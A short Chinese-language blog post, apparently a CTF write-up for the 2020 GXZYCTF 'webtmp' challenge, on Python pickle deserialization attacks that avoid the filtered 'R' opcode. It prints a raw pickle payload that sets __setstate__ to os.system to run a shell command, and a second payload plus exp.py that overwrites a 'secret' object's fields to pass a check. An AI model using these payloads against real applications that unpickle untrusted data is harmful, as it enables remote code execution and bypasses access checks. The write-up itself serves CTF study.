0%

2020 GXZYCTF webtmp

发表于 更新于 分类于
本文字数: 860 阅读时长 ≈ 1 分钟

过滤了R

从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势

一开始考虑RCE

1
b'\x80\x03c__main__\nAnimal\n)\x81}(V__setstate__\ncos\nsystem\nubVls /\nb0c__main__\nAnimal\n)\x81}(X\x04\x00\x00\x00nameq\x03X\x14\x00\x00\x00\xe4\xb8\x80\xe7\xbb\x99\xe6\x88\x91\xe5\x93\xa9giaogiaoq\x04X\x08\x00\x00\x00categoryq\x05X\x04\x00\x00\x00Giaoq\x06ub.'

提示global XX,应该是因为raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name)),后来考虑改写secret对象

secret.py

1
secret = {'name':'xx','category':'yy'}

exp.py

1
2
3
4
5
6
7
8
9
10
import pickle
import pickletools
import secret
class Animal:
    def __init__(self):
        self.name = 'aa'
        self.category = 'bb'
s = b'\x80\x03c__main__\nsecret\n}(Vname\nVaa\nVcategory\nVbb\nub0c__main__\nAnimal\n)\x81}(X\x04\x00\x00\x00nameX\x02\x00\x00\x00aaX\x08\x00\x00\x00categoryX\x02\x00\x00\x00bbub.'
l = pickle.loads(s)
pickletools.dis(s)

1584745003(1)

base64编码即可